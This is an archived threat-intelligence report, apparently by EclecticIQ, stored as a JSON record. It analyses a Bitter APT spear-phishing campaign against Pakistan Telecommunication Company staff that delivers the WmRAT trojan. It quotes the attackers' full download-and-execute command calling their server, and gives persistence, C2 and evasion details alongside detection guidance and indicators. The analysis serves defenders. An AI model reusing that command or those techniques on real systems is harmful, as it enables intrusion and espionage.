{
	"id": "c7177c96-99c4-418f-8fb5-a9089d7a5a65",
	"created_at": "2026-04-06T00:10:53.227463Z",
	"updated_at": "2026-04-10T03:37:58.800866Z",
	"deleted_at": null,
	"sha1_hash": "f888162d59d3ce6d321ba37c4c76e25548189111",
	"title": "Pakistan Telecommunication Company (PTCL) Targeted by Bitter APT During Heightened Regional Conflict",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1485491,
	"plain_text": "Pakistan Telecommunication Company (PTCL) Targeted by Bitter\r\nAPT During Heightened Regional Conflict\r\nArchived: 2026-04-05 15:34:28 UTC\r\nExecutive Summary\r\nOn May 7, 2025, during the active military escalation between Pakistan and India—specifically in the context of\r\nIndia's military campaign 'Operation Sindoor'—EclecticIQ analysts observed that Bitter APT (also known as TA397)\r\n[1] very likely targeted Pakistan Telecommunication Company Limited (PTCL) workers [2] in a spear phishing\r\ncampaign, very likely to deliver malware. Analysts assess that Bitter APT is very likely a South Asian state-sponsored\r\nactor conducting cyber-enabled espionage operations by stealing state and trade secrets.\r\nEclecticIQ and Hudson Rock researchers assess that Bitter APT very likely used stolen email credentials from\r\nPakistan’s Counter Terrorism Department (CTD) to carry out the attack. The spear phishing campaign targeted PTCL\r\npersonnel in critical roles, including 5G infrastructure engineers, DevOps specialists, project managers, and satellite\r\ncommunication experts.\r\nFigure 1 - EclecticIQ Threat Intelligence Platform (TIP) graph view.\r\nThe malicious email [3], received on Wednesday, May 7, 2025, at 12:09 PM, contained an Internet Query (IQY)\r\nattachment with a malicious Excel macro [4]. This macro used the Windows command line (CMD) to download and\r\nexecute a variant of WmRAT [5]. Upon file execution, the attackers established a connection to a command and\r\ncontrol domain previously linked to Bitter APT, which resolved to a known associated IP address [6].\r\nThe timing of the email, coinciding with reported military confrontations between India and Pakistan, is likely an\r\nattempt to target Pakistan’s telecommunications sector during a period of regional tension. This timing aligns with\r\nBitter APT’s established pattern of strategic intelligence gathering through cyber-enabled espionage.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 1 of 10\n\nNation-State APTs Leveraging Infostealers for Cyber-Enabled Espionage Operations\r\nAccording to data from Hudson Rock, initial access to the Counter Terrorism Department (CTD) email account at\r\nIslamabad Police Headquarters (ctd@islamabadpolice.gov.pk) was very likely obtained using compromised\r\ncredentials. These credentials originated from a Pakistani machine infected with a StealC infostealer variant and were\r\nfirst observed on August 13, 2024.\r\nFigure 2 - Hudson Rock platform showing infostealer logs.\r\nCookies recovered from the infected machine indicate that the StealC infostealer was delivered after the user downloaded\r\n“cracked” software on the same day as the infection.\r\nFigure 3 – Hudson Rock platform showing evidence of infostealer installation on a CTD employee device.\r\nThe compromised CTD employee had experienced four previous infostealer infections between 2022 and 2024. The\r\nmost recent infection, in August 2024, resulted in the exposure of the critical webmail credentials subsequently\r\nleveraged in the May 2025 campaign.\r\nFigure 4 - Hudson Rock platform showing the infection chain in a timeline, indicating active compromise since 2022.\r\nThe compromise of the CTD’s email account provided threat actors with prolonged, privileged access to a critical\r\nPakistani law enforcement system. This persistent foothold allowed actors to monitor communications and, during the\r\nIndia-Pakistan conflict, leverage the compromised account to craft a convincing spear phishing email.\r\nAbuse of IQY Extension in Windows Leads to WmRAT\r\nThreat actors leveraged the IQY file extension in an email attachment named “Security Brief Report.iqy” as part of\r\nthe social engineering lure, designed to appear legitimate and create urgency to open it.\r\nFigure 5 - Spear phishing email sent from the compromised Pakistan Counter Terrorism Department (CTD) account, targeting\r\nPakistan Telecommunication Company.\r\nIQY is a legitimate Microsoft Office file format, very likely leveraged for anti-malware and email gateway evasion\r\npurposes. IQY files can execute Excel formulas capable of triggering system processes such as CMD or LoLBins\r\n(Living-off-the-Land Binaries).\r\nUpon opening the IQY attachment, the victim's system executed an Excel macro with the following command:\r\ncmd|' /c cd C:\\\\programdata \u0026 set /P=\\\"MZ\\\"\u003cnul\u003eb1 \u0026 curl -o b2 https://fogomyart[.]com/vcswin \u0026 copy /b b1+b2 vcswin.exe \u0026 start /b vcswin.exe'!A0\r\nThis command uses the built-in Windows binary curl.exe to download a malicious BAT script [7] from\r\nfogomyart[.]com/random.php. The script changes the working directory to C:\\ProgramData, creates an executable\r\nheader with the characters MZ - the standard signature for DOS and Windows executables - and then downloads a\r\npayload that is disguised as a PNG image file (vcswin.png) from the same domain.\r\nFigure 6 - Content of the downloaded BAT file.\r\nThe script reconstructs a valid PE (Portable Executable) file by crafting an MZ header in memory and appending it to\r\nthe binary payload - a common evasion tactic, as the original file may appear benign without a proper header.\r\nAfter downloading the payload, the script removes the fake PNG header, creating a functional executable (WmRAT\r\nvariant: vcswin.exe) and runs it silently in the background, indicating a clear attempt to execute malicious code while\r\navoiding detection.\r\nCapabilities of WmRAT Variant\r\nEclecticIQ analysts observed that the payload downloaded from fogomyart[.]com/vcswin.png is a new variant of\r\nWmRAT - a remote access trojan designed for intelligence gathering and data exfiltration.\r\nOn December 17, 2024, Proofpoint researchers observed Bitter APT using WmRAT to target a Turkish defence-sector\r\norganization [8]. From the reverse-engineered sample (vcswin.png), analysts compiled the following list of WmRAT capabilities:\r\nGathers username and hostname of the victim machine\r\nEnumerates logical drives and directory contents\r\nUploads and downloads files\r\nTakes screenshots of the desktop\r\nRetrieves geolocation information\r\nExecutes commands via CMD or PowerShell\r\nReceives and processes commands from the C2 server\r\nSupports file exfiltration and remote file stream writing\r\nRetrieves file timestamps and disk usage information\r\nWmRAT establishes persistence using the Windows Registry and launches a secondary process named gentwin.exe\r\nfrom the Roaming directory. This process uses cmd.exe and reg.exe to add a registry key under:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nThe registry entry points to vcswin.exe in C:\\ProgramData. Finally, vcswin.exe is executed, establishing persistence\r\nfor the malware to run on system startup.\r\nCommand and Control Server Embedded Inside WmRAT as XOR-Encrypted String\r\nEclecticIQ analysts reverse-engineered the WmRAT variant and discovered that its command-and-control (C2) server\r\nwas hidden within the .rdata section of the malware as an XOR-encrypted string.\r\nFigure 7 - Disassembled WmRAT sample showing the XOR-encrypted string.\r\nEclecticIQ analysts decrypted the string and revealed the command-and-control (C2) domain:\r\ntradesmarkets[.]greenadelhouse[.]com\r\nFigure 8 - Decrypting the XOR-encrypted string to obtain the cleartext C2 server using\r\nCyberChef.\r\nPassive DNS data shows that this domain resolved to the following two IP addresses:\r\n185.244.151.84 on April 3, 2025, and\r\n185.244.151.87 on May 7, 2025\r\n185.244.151.84 previously hosted the staging domain jacknwoods[.]com documented by Proofpoint [9] in a\r\nDecember 2024 campaign. Proofpoint attributed this campaign to TA397 (also known as Bitter APT). This overlap in\r\ninfrastructure, along with the consistent use of WmRAT and tactics, strongly supports attribution of the current\r\nactivity to Bitter APT.\r\nEclecticIQ analysts observed that WmRAT communicates with a remote C2 server using HTTP GET requests over\r\nHTTPS (port 443):\r\nFigure 9 - C2 communication between the victim device and the attacker in Wireshark, showing victim device information\r\nsent to the attacker-controlled C2 in Base64-encoded format.\r\nThe malware communicates with its C2 server through a URI path designed to blend in with legitimate web traffic:\r\n/excerorderslistoncbook.php. This URI includes a parameter named vrocean that contains Base64-encoded data.\r\nWhen decoded, this parameter reveals victim system identifiers:\r\nBAMUDTK*Admin*Windows10Enterprise\r\nThe string serves as a unique identifier for the infected system. It contains the host name or ID (BAMUDTK), the\r\nuser role (Admin), and the operating system version (Windows10Enterprise). Identifiers help attackers track and\r\nmanage infected hosts within their infrastructure.\r\nTo evade detection and mimic legitimate traffic, the request uses a spoofed User-Agent string: Mozilla/4.0\r\n(compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.30729; .NET CLR 3.5.30729). This User-Agent mimics an outdated Internet Explorer browser on a\r\nWindows system, helping the traffic blend in with common legacy enterprise environments and potentially bypass\r\nbasic network security filters.\r\nOnce this C2 check-in is complete, the malware waits for remote commands from the threat actors. These commands are\r\ntypically issued over the same C2 channel and can be executed on the victim machine using either PowerShell or the\r\nWindows command prompt.\r\nThis functionality provides attackers with remote control capabilities, allowing them to execute arbitrary instructions,\r\nfurther compromise the system, or move laterally within the network.\r\nInfostealers to Espionage: Bitter APT Group’s Multi-Stage Cyber Espionage\r\nOperation Against PTCL\r\nBitter APT’s cyber intrusion into Pakistan Telecommunication Company Limited (PTCL) is likely a deliberate\r\nespionage campaign timed with regional conflict. As Pakistan’s largest telecom operator—managing critical services\r\nlike satellite links, fiber-optic backbones, and 5G deployments—PTCL is an obvious high-value target for state-backed actors seeking strategic leverage.\r\nBy compromising PTCL engineers, DevOps teams, and satellite specialists, Bitter APT likely aims to gain deeper\r\naccess to Pakistan’s communications infrastructure. Such access enables:\r\nSignals intelligence: Real-time interception of civilian, corporate, and government communications.\r\nNetwork mapping: Identifying routes, interconnects, and vulnerabilities in core telecom infrastructure.\r\nSupply-chain insights: Understanding foreign vendor ties, procurement strategies, and technical dependencies.\r\nConflict preparation: Positioning for sabotage or disruption of telecom services in future crises.\r\nMetadata exploitation: Tracking personnel movements and command tempo via encrypted traffic patterns.\r\nEclecticIQ analysts assess that threat actors are likely pre-positioning for future conflict. By embedding itself within\r\nPTCL during active hostilities, Bitter APT gains a long-term asymmetric advantage: the power to monitor or disrupt in\r\nany future escalation.\r\nDetection Strategies\r\nMonitor for Suspicious IQY File Execution\r\nAlert on .iqy files initiating network activity or spawning processes such as exe, powershell.exe, mshta.exe, or\r\ncurl.exe.\r\nMonitor for Office applications executing child processes (Living-off-the-Land Binaries - LoLBins).\r\nEndpoint and Behavioral Indicators\r\nDetect execution of unusual commands involving curl, copy /b, or appending MZ headers to files in\r\nC:\\ProgramData.\r\nMonitor file creation patterns involving exe and secondary persistence-related binaries like gentwin.exe.\r\nRegistry Persistence Detection\r\nTrack modifications to the Windows Registry path:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nfor entries pointing to non-standard or suspicious executables such as vcswin.exe.\r\nC2 Communication Patterns\r\nDetect outbound HTTPS traffic to suspicious domains (e.g., greenadelhouse[.]com) using encoded parameters\r\nsuch as vrocean.\r\nMonitor HTTP GET requests that mimic legitimate URIs (e.g., /excerorderslistoncbook.php) with Base64-encoded identifiers.\r\nIndicators of Compromise (IOC)\r\nSpear Phishing Email:\r\n36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590\r\nWmRAT Loader BAT:\r\nfogomyart[.]com/random.php\r\nde6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed\r\nWmRAT Sample:\r\ngreenadelhouse[.]com\r\nedb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56\r\nMITRE ATT\u0026CK Matrix\r\nReferences\r\n[1] “BITTER, T-APT-17, Group G1002 | MITRE ATT\u0026CK®.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://attack.mitre.org/groups/G1002/\r\n[2] “Pakistan’s No. 1 Telecommunication Company - PTCL.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://ptcl.com.pk/\r\n[3] “VirusTotal - File - 36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590\r\n[4] “VirusTotal - File - 15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436/detection\r\n[5] “VirusTotal - File - edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56/relations\r\n[6] “VirusTotal - Domain - tradesmarkets.greenadelhouse.com.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/domain/tradesmarkets.greenadelhouse.com/relations\r\n[7] “VirusTotal - File - de6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed.” Accessed:\r\nMay 15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/de6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed\r\n[8] “Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US,” Proofpoint.\r\nAccessed: May 20, 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\n[9] “Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US,” Proofpoint.\r\nAccessed: May 15, 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nSource: https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict"
	],
	"report_names": [
		"pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict"
	],
	"threat_actors": [
		{
			"id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b",
			"created_at": "2022-10-27T08:27:13.133291Z",
			"updated_at": "2026-04-10T02:00:05.315213Z",
			"deleted_at": null,
			"main_name": "BITTER",
			"aliases": [
				"T-APT-17"
			],
			"source_name": "MITRE:BITTER",
			"tools": [
				"ZxxZ"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375",
			"created_at": "2023-01-06T13:46:39.332092Z",
			"updated_at": "2026-04-10T02:00:03.290017Z",
			"deleted_at": null,
			"main_name": "HAZY TIGER",
			"aliases": [
				"T-APT-17",
				"APT-C-08",
				"Orange Yali",
				"TA397"
			],
			"source_name": "MISPGALAXY:HAZY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bf6cb670-bb69-473f-a220-97ac713fd081",
			"created_at": "2022-10-25T16:07:23.395205Z",
			"updated_at": "2026-04-10T02:00:04.578924Z",
			"deleted_at": null,
			"main_name": "Bitter",
			"aliases": [
				"G1002",
				"T-APT-17",
				"TA397"
			],
			"source_name": "ETDA:Bitter",
			"tools": [
				"Artra Downloader",
				"ArtraDownloader",
				"Bitter RAT",
				"BitterRAT",
				"Dracarys"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86fd71d3-06dc-4b73-b038-cedea7b83bac",
			"created_at": "2022-10-25T16:07:23.330793Z",
			"updated_at": "2026-04-10T02:00:04.545236Z",
			"deleted_at": null,
			"main_name": "APT 17",
			"aliases": [
				"APT 17",
				"ATK 2",
				"Beijing Group",
				"Bronze Keystone",
				"Deputy Dog",
				"Elderwood",
				"Elderwood Gang",
				"G0025",
				"G0066",
				"Operation Aurora",
				"Operation DeputyDog",
				"Operation Ephemeral Hydra",
				"Operation RAT Cook",
				"SIG22",
				"Sneaky Panda",
				"TEMP.Avengers",
				"TG-8153",
				"Tailgater Team"
			],
			"source_name": "ETDA:APT 17",
			"tools": [
				"9002 RAT",
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"Agent.dhwf",
				"AngryRebel",
				"BlackCoffee",
				"Briba",
				"Chymine",
				"Comfoo",
				"Comfoo RAT",
				"Darkmoon",
				"DeputyDog",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Fexel",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Gresim",
				"HOMEUNIX",
				"HiKit",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Jumpall",
				"Kaba",
				"Korplug",
				"Linfo",
				"MCRAT.A",
				"McRAT",
				"MdmBot",
				"Mdmbot.E",
				"Moudour",
				"Mydoor",
				"Naid",
				"Nerex",
				"PCRat",
				"PNGRAT",
				"Pasam",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Naid",
				"Vasport",
				"Wiarp",
				"Xamtrav",
				"Zox",
				"ZoxPNG",
				"ZoxRPC",
				"gresim",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434253,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.pdf",
		"text": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.txt",
		"img": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.jpg"
	}
}